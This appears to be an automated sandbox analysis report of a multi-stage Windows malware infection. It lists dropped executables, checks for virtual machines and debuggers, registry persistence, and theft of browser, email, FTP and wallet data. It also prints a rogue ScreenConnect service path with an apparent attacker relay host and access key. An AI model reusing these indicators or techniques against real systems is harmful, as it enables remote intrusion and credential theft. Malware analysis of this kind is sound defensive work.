Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=e228137a-1681-43c0-a833-6e8e39d6fe60&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA6tAbC%2fd6IUm5KlyUsecM8wAAAAACAAAAAAAQZgAAAAEAACAAAAD%2bFWnEtXsXf6dv9%2biWS2mb246%2bRvHSvQbUp%2fSFTn0blwAAAAAOgAAAAAIAACAAAADkHLI487uefiU0MIAGiHY4HdRUacWhhdqcpeKLK0S3MqAEAABTEdQ2nm9aw8mWDMrlRhLj9YAw1IOICtN3qYONlpSq6J2mNV55%2fAvzADXO6S4Tmr1q7lF97Rkz%2blaDcqTVA2IHcz5jej3UKDxfYkSEDDirtySp9%2fGe5b1siLBj2pbmkYUMHgvq4IZL%2fLMry%2bGfMf0weSEE%2foBLPuIyIh3ZfQ8SgmNp2Hp2C%2ffhEu3QZfVrjyou9YL8do7jKatydjn9ZiodaC5Pvw3PJAvy%2bOX9KDg8ZgB4wMoqqchqCYNx%2f3yxCQDHCGz1hygzuMOBCSyONUWzeOxjjddpmU3dY08dNa4V9TAAwmVk0J2G2Kg%2fdwxjPnKn%2bIkPIpyNFwcrpzvpo3QAVMy9YzUc4R8Vrkn233x9WWV%2bf0nkucOpj3msl5UMJGrVqb5EMilczPC7D7hS9ynjUeKBi8OnWui2oyY5qiK4oyZcM4v6hGkbj1k4Ie92xpZzBvrj9Fquu%2fmlQbYockpoDyh%2f3st%2f5XOc5NjgEtmzs7zHDw8FrqRV5c8X2JLKwoPH3sg5TdQIZjz%2f5ehl0tHCeeLCQeu4LBnWbtOJ1IGnE1ccKPj%2bWzsP5CKwaHGHtFbRJg3OrHCHnKULTVV2hPgfZThG0lqE199iHP12Cqj9LQdhwMkFwWipvu29MMaZYLf0OxT3rwlBhlbvLA7nqPJXlfLvweIMsViX%2bUJolLM4xs0zu%2fnRyfkNFIdJ9nTztmcaQFLlzuYxkqepiIgOXmkt%2fXfndfcjtzaKo7wNI%2feJaY5eTRBn9BYsNwjvOIf4jWtjpw5NN18ac0hvCQSqeeg6m96SSKysJTp4tUryCokLHbvcxAj%2fZehgcJk7FOiyKAbDci5CXLNGpd70YQkMUW47JvCKJmt78WilpCvrhdR%2b9atel4zuErQf70pXopHA8N7r020%2fz0AUQBo89lQNQr9%2bhminXWES%2fCcxqhJxGvTR%2btzfntNVEM90aK9JTt1AyDB124P9ugoJQGl58pQov%2fgPmt1gOQ25Ck%2f5rZfrJhfZSwOKXkNYwAEuxTUNvz3AtlNBP97jiOuZhAij5Zc7y4kaXsDKSN8Zw9ZwIcQTQXHrfMEaYcwDRIugNjE0wAYsRr5omnCnUaOg819cEydPBl1LKbmRPk6wwdZRs7dZWlO9ST%2bBU3q9cjLiQEQ8rCLoxrlIRtwyCJCoK8S5eUHJwTL1WaJ9N4Ol0JCnW0aIKehufneBFgiIl7yzX%2bqvx68Ao8xnthe26AzpTf3tGqndfnEvIQcwpPALNKFxZCwKPNadpeaR%2fd3VIBYxBa19k%2bxQMLmfn3XaFNOCwfyavO8%2fuP6jk3Ly7s1BcpOjHCof%2fjtSY3VdyJAOlu2XLO6%2bm9Y%2f%2fmmmiTiWUFvZzF9H6alw8AAgZZ8UO7i9rpnVRM8dwzdB0gM7fnGAlkYAqreO09MpdV5FV93DQ5Z13L7Aa9gmmaFPLlaPJWLS8hcQhXiT4bo1oDhBK9qtJNZFM2%2btVjKJhsfG7wuhg6xIofz%2bWvEqRlmYtwzyUt7ZwpiyE5uI%2fASFFBAtD%2fLB5yLcoCQlm1sNXw9alfJOuh6w11zgms461sFVnVoznWiRUtauS%2fmOEG1E1UAAAADtl9q1L%2bRsXIKHuIQg6uVeVTXG624tqRh%2bY3o4d9DQ53iQnwPN6J6dszobqy5sF92DoON2Eg1nn3ORH%2fo8Fa0t&c=test&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\b92cc19684.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\b92cc19684.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\jahxslxg.tmp C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\jahxslxg.newcfg C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f77f1be.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF431.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
File opened for modification C:\Windows\Installer\f77f1be.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF326.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\f77f1c1.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77f1bf.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF2F6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
